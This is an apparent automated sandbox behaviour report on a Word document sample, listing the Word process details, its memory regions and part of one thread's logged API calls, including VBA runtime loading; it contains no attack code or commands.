8ed61abc371da7cf5ed2d8b9b7fdf20b8ca1b924c19fc9e8d50ca1feaccb6ae9 (SHA256)
(5)DOC20181114214.doc
Word Document
Created at 2018-11-14 09:18:00
Monitored Processes
Behavior Information - Sequential View
Process #1: winword.exe
561
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\root\office16\winword.exe |
| Command Line | "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:25, Reason: Analysis Target |
| Unmonitor | End Time: 00:03:37, Reason: Self Terminated |
| Monitor Duration | 00:03:12 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x91c |
| Parent PID | 0x39c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
9B0
0x
9AC
0x
99C
0x
994
0x
988
0x
984
0x
980
0x
97C
0x
978
0x
974
0x
970
0x
96C
0x
968
0x
964
0x
960
0x
940
0x
93C
0x
938
0x
930
0x
92C
0x
920
0x
A24
0x
A28
0x
A30
0x
A38
0x
B00
0x
B0C
0x
8D8
0x
904
0x
5C4
0x
1E0
0x
8A0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00020fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00043fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x00060fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00070fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000080000 | 0x00080000 | 0x00086fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00190000 | 0x001f6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000200000 | 0x00200000 | 0x00201fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00210fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x00220fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000230000 | 0x00230000 | 0x00231fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000250000 | 0x00250000 | 0x00251fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000260000 | 0x00260000 | 0x00262fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x00271fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0028ffff | Private Memory | - |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00292fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x003affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x004affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004b0000 | 0x004b0000 | 0x00637fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000640000 | 0x00640000 | 0x007c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007d0000 | 0x007d0000 | 0x01bcffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01bd0000 | 0x01e9efff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001ea0000 | 0x01ea0000 | 0x02292fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000022a0000 | 0x022a0000 | 0x0239ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000023a0000 | 0x023a0000 | 0x023a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000023b0000 | 0x023b0000 | 0x023b2fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000023c0000 | 0x023c0000 | 0x023c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000023d0000 | 0x023d0000 | 0x0240ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002410000 | 0x02410000 | 0x024eefff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000024f0000 | 0x024f0000 | 0x024f7fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002500000 | 0x02500000 | 0x0250ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002510000 | 0x02510000 | 0x0270ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x02710000 | 0x027cffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000027d0000 | 0x027d0000 | 0x027d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000027e0000 | 0x027e0000 | 0x0285ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002860000 | 0x02860000 | 0x02860fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002870000 | 0x02870000 | 0x02870fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002880000 | 0x02880000 | 0x02880fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002890000 | 0x02890000 | 0x028b7fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000028c0000 | 0x028c0000 | 0x028c0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000028d0000 | 0x028d0000 | 0x028d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000028e0000 | 0x028e0000 | 0x028e4fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000028f0000 | 0x028f0000 | 0x028f0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002900000 | 0x02900000 | 0x029fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002a00000 | 0x02a00000 | 0x02a01fff | Pagefile Backed Memory | r |
|
|
|
- |
| index.dat | 0x02a10000 | 0x02a1bfff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x02a20000 | 0x02a27fff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x02a30000 | 0x02a3ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000002a40000 | 0x02a40000 | 0x02a4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002a50000 | 0x02a50000 | 0x02a50fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002a60000 | 0x02a60000 | 0x02b5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002b60000 | 0x02b60000 | 0x02b60fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002b70000 | 0x02b70000 | 0x02b70fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002b80000 | 0x02b80000 | 0x02c7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c80000 | 0x02c80000 | 0x02ceafff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002cf0000 | 0x02cf0000 | 0x02cf0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002d00000 | 0x02d00000 | 0x02d00fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002d10000 | 0x02d10000 | 0x02d11fff | Pagefile Backed Memory | r |
|
|
|
- |
| msxml6r.dll | 0x02d20000 | 0x02d20fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x02d30000 | 0x02d4ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002d50000 | 0x02d50000 | 0x02d50fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000002d60000 | 0x02d60000 | 0x02d61fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002d70000 | 0x02d70000 | 0x02deffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002df0000 | 0x02df0000 | 0x02eeffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002ef0000 | 0x02ef0000 | 0x02ef0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002f50000 | 0x02f50000 | 0x0304ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003050000 | 0x03050000 | 0x0314ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000003150000 | 0x03150000 | 0x0354ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000003550000 | 0x03550000 | 0x0364ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003650000 | 0x03650000 | 0x0374ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003790000 | 0x03790000 | 0x0388ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000038a0000 | 0x038a0000 | 0x0399ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000039a0000 | 0x039a0000 | 0x03a1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003a20000 | 0x03a20000 | 0x03b1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003b50000 | 0x03b50000 | 0x03b5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003b60000 | 0x03b60000 | 0x03c5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003c60000 | 0x03c60000 | 0x03cdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003cf0000 | 0x03cf0000 | 0x03cfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003d10000 | 0x03d10000 | 0x03d8ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000003d90000 | 0x03d90000 | 0x0418ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000041f0000 | 0x041f0000 | 0x042effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000042f0000 | 0x042f0000 | 0x04421fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004470000 | 0x04470000 | 0x0456ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004570000 | 0x04570000 | 0x04d6ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000004d70000 | 0x04d70000 | 0x050b2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000005120000 | 0x05120000 | 0x0521ffff | Private Memory | rw |
|
|
|
- |
| segoeui.ttf | 0x05220000 | 0x0529efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005310000 | 0x05310000 | 0x0538ffff | Private Memory | rw |
|
|
|
- |
| staticcache.dat | 0x05390000 | 0x05cbffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005da0000 | 0x05da0000 | 0x05e9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005ea0000 | 0x05ea0000 | 0x05f9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005fa0000 | 0x05fa0000 | 0x05faffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005ff0000 | 0x05ff0000 | 0x060effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006180000 | 0x06180000 | 0x0627ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006330000 | 0x06330000 | 0x0642ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006460000 | 0x06460000 | 0x0646ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006510000 | 0x06510000 | 0x0660ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000006610000 | 0x06610000 | 0x0760ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000007610000 | 0x07610000 | 0x07e0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000007f90000 | 0x07f90000 | 0x0800ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008080000 | 0x08080000 | 0x0817ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008190000 | 0x08190000 | 0x0820ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008210000 | 0x08210000 | 0x0860ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000037a30000 | 0x37a30000 | 0x37a3ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000037c80000 | 0x37c80000 | 0x37c8ffff | Private Memory | rwx |
|
|
|
- |
| osppc.dll | 0x751b0000 | 0x751e2fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x77e00000 | 0x77e06fff | Memory Mapped File | rwx |
|
|
|
- |
| normaliz.dll | 0x77e10000 | 0x77e12fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winword.exe | 0x13ff50000 | 0x14012bfff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007febdd50000 | 0x7febdd50000 | 0x7febdd5ffff | Private Memory | rwx |
|
|
|
- |
| private_0x000007febfb90000 | 0x7febfb90000 | 0x7febfb9ffff | Private Memory | rwx |
|
|
|
- |
| ivy.dll | 0x7fee4990000 | 0x7fee4be4fff | Memory Mapped File | rwx |
|
|
|
- |
| chart.dll | 0x7fee4bf0000 | 0x7fee59c5fff | Memory Mapped File | rwx |
|
|
|
- |
| msptls.dll | 0x7fee59d0000 | 0x7fee5b43fff | Memory Mapped File | rwx |
|
|
|
- |
| riched20.dll | 0x7fee5c70000 | 0x7fee5f0afff | Memory Mapped File | rwx |
|
|
|
- |
| adal.dll | 0x7fee5f10000 | 0x7fee6029fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x7fee61d0000 | 0x7fee6268fff | Memory Mapped File | rwx |
|
|
|
- |
| dwrite.dll | 0x7fee6270000 | 0x7fee63edfff | Memory Mapped File | rwx |
|
|
|
- |
| d3d10warp.dll | 0x7fee63f0000 | 0x7fee65bffff | Memory Mapped File | rwx |
|
|
|
- |
| msores.dll | 0x7fee65c0000 | 0x7feea9a6fff | Memory Mapped File | rwx |
|
|
|
- |
| mso99lres.dll | 0x7feea9b0000 | 0x7feeb6a4fff | Memory Mapped File | rwx |
|
|
|
- |
| mso40uires.dll | 0x7feeb6b0000 | 0x7feebaecfff | Memory Mapped File | rwx |
|
|
|
- |
| mso.dll | 0x7feebaf0000 | 0x7feed51bfff | Memory Mapped File | rwx |
|
|
|
- |
| mso98win32client.dll | 0x7feed520000 | 0x7feee1c6fff | Memory Mapped File | rwx |
|
|
|
- |
| mso40uiwin32client.dll | 0x7feee1d0000 | 0x7feeec9efff | Memory Mapped File | rwx |
|
|
|
- |
| mso30win32client.dll | 0x7feeeca0000 | 0x7feef383fff | Memory Mapped File | rwx |
|
|
|
- |
| mso20win32client.dll | 0x7feef390000 | 0x7feef832fff | Memory Mapped File | rwx |
|
|
|
- |
| oart.dll | 0x7feef840000 | 0x7fef07c4fff | Memory Mapped File | rwx |
|
|
|
- |
| wwlib.dll | 0x7fef07d0000 | 0x7fef2fa8fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x7fef30b0000 | 0x7fef311efff | Memory Mapped File | rwx |
|
|
|
- |
| msointl.dll | 0x7fef3120000 | 0x7fef32bcfff | Memory Mapped File | rwx |
|
|
|
- |
| wwintl.dll | 0x7fef32c0000 | 0x7fef337ffff | Memory Mapped File | rwx |
|
|
|
- |
| d2d1.dll | 0x7fef3380000 | 0x7fef3461fff | Memory Mapped File | rwx |
|
|
|
- |
| mso50win32client.dll | 0x7fef3470000 | 0x7fef34fafff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp140.dll | 0x7fef3500000 | 0x7fef359bfff | Memory Mapped File | rwx |
|
|
|
- |
| d3d11.dll | 0x7fef35a0000 | 0x7fef3665fff | Memory Mapped File | rwx |
|
|
|
- |
| mlang.dll | 0x7fef3670000 | 0x7fef36aafff | Memory Mapped File | rwx |
|
|
|
- |
| rasman.dll | 0x7fef4d40000 | 0x7fef4d5bfff | Memory Mapped File | rwx |
|
|
|
- |
| rasapi32.dll | 0x7fef4d60000 | 0x7fef4dc1fff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 296 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Threads
Thread 0x920
433
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-11-14 09:19:25 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 102227 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\program files\microsoft office\root\office16\winword.exe, base_address = 0x13ff50000 |
|
1 | |
| Module | Load | module_name = Comctl32.dll, base_address = 0x7fefc690000 |
|
1 | |
| Module | Get Handle | module_name = MSI.DLL, base_address = 0x7fefa750000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsiProvideQualifiedComponentA, address_out = 0x7fefa7d3b3c |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsiGetProductCodeA, address_out = 0x7fefa7ca13c |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsiReinstallFeatureA, address_out = 0x7fefa7d1618 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsiProvideComponentA, address_out = 0x7fefa7cf088 |
|
1 | |
| Module | Get Handle | module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x7fee34e0000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoVBADigSigCallDlg, address_out = 0x7fee35e72c0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoVbaInitSecurity, address_out = 0x7fee35560b0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFIEPolicyAndVersion, address_out = 0x7fee3501a60 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFAnsiCodePageSupportsLCID, address_out = 0x7fee3555f50 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFInitOffice, address_out = 0x7fee34ff000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoUninitOffice, address_out = 0x7fee34ee860 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFGetFontSettings, address_out = 0x7fee34e3fc0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoRgchToRgwch, address_out = 0x7fee34f2380 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoHrSimpleQueryInterface, address_out = 0x7fee34e7b80 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoHrSimpleQueryInterface2, address_out = 0x7fee34e7b20 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFCreateControl, address_out = 0x7fee34e8730 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFLongLoad, address_out = 0x7fee3623260 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFLongSave, address_out = 0x7fee3623280 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFGetTooltips, address_out = 0x7fee34f1f40 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFSetTooltips, address_out = 0x7fee3556370 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFLoadToolbarSet, address_out = 0x7fee3544590 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFCreateToolbarSet, address_out = 0x7fee34e55b0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoHpalOffice, address_out = 0x7fee34f0240 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFWndProcNeeded, address_out = 0x7fee34e3d10 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFWndProc, address_out = 0x7fee34e6d30 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFCreateITFCHwnd, address_out = 0x7fee34e3d40 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoDestroyITFC, address_out = 0x7fee34ee6f0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFPitbsFromHwndAndMsg, address_out = 0x7fee34edf40 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFGetComponentManager, address_out = 0x7fee34e7bf0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoMultiByteToWideChar, address_out = 0x7fee34efcd0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoWideCharToMultiByte, address_out = 0x7fee34e8b20 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoHrRegisterAll, address_out = 0x7fee35e2ef0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFSetComponentManager, address_out = 0x7fee34f42c0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFCreateStdComponentManager, address_out = 0x7fee34e3e20 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFHandledMessageNeeded, address_out = 0x7fee34eab10 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoPeekMessage, address_out = 0x7fee34ea7d0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFCreateIPref, address_out = 0x7fee34e1550 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoDestroyIPref, address_out = 0x7fee34ee830 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoChsFromLid, address_out = 0x7fee34e13d0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoCpgFromChs, address_out = 0x7fee34e6660 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoSetLocale, address_out = 0x7fee34e1500 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFSetHMsoinstOfSdm, address_out = 0x7fee34e3dd0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoSetVbaInterfaces, address_out = 0x7fee35e71e0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoGetControlInstanceId, address_out = 0x7fee35b6d10 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VbeuiFIsEdpEnabled, address_out = 0x7fee36298e0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VbeuiEnterpriseProtect, address_out = 0x7fee3629830 |
|
1 | |
| Environment | Get Environment String | name = DDRYBUR |
|
1 | |
| Module | Get Filename | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
1 | |
| Module | Load | module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL, base_address = 0x7fee5b80000 |
|
1 | |
| Module | Get Filename | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\Licenses |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7, data = } |
|
1 | |
| Module | Load | module_name = OLEAUT32.DLL, base_address = 0x7feffd80000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SysFreeString, address_out = 0x7feffd81320 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = LoadTypeLib, address_out = 0x7feffd8f1e0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = RegisterTypeLib, address_out = 0x7feffddcaa0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = QueryPathOfRegTypeLib, address_out = 0x7feffe11760 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = UnRegisterTypeLib, address_out = 0x7feffe120d0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleTranslateColor, address_out = 0x7feffdac760 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleCreateFontIndirect, address_out = 0x7feffddecd0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleCreatePictureIndirect, address_out = 0x7feffdde840 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleLoadPicture, address_out = 0x7feffdef420 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleCreatePropertyFrameIndirect, address_out = 0x7feffde4ec0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleCreatePropertyFrame, address_out = 0x7feffde9350 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleIconToCursor, address_out = 0x7feffdb6e40 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = LoadTypeLibEx, address_out = 0x7feffd8a550 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleLoadPictureEx, address_out = 0x7feffdef320 |
|
1 | |
| Window | Create | class_name = ThunderMain, wndproc_parameter = 0 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\user32.dll, base_address = 0x77a20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetSystemMetrics, address_out = 0x77a394f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = MonitorFromWindow, address_out = 0x77a35f08 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = MonitorFromRect, address_out = 0x77a32b00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = MonitorFromPoint, address_out = 0x77a2ab64 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = EnumDisplayMonitors, address_out = 0x77a35c30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetMonitorInfoA, address_out = 0x77a2a730 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = EnumDisplayDevicesA, address_out = 0x77a2a5b4 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = oleaut32.dll, base_address = 0x7feffd80000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = DispCallFunc, address_out = 0x7feffd82270 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = LoadTypeLibEx, address_out = 0x7feffd8a550 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = UnRegisterTypeLib, address_out = 0x7feffe120d0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = CreateTypeLib2, address_out = 0x7feffe0dbd0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDateFromUdate, address_out = 0x7feffd85c90 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarUdateFromDate, address_out = 0x7feffd86330 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = GetAltMonthNames, address_out = 0x7feffda66c0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarNumFromParseNum, address_out = 0x7feffd84710 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarParseNumFromStr, address_out = 0x7feffd848f0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecFromR4, address_out = 0x7feffdbb640 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecFromR8, address_out = 0x7feffdbb360 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecFromDate, address_out = 0x7feffdc2640 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecFromI4, address_out = 0x7feffda58a0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecFromCy, address_out = 0x7feffda5820 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarR4FromDec, address_out = 0x7feffdbaf20 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = GetRecordInfoFromTypeInfo, address_out = 0x7feffdda0c0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = GetRecordInfoFromGuids, address_out = 0x7feffe12160 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArrayGetRecordInfo, address_out = 0x7feffda5af0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArraySetRecordInfo, address_out = 0x7feffda5a90 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArrayGetIID, address_out = 0x7feffda5a60 |
|
1 | |
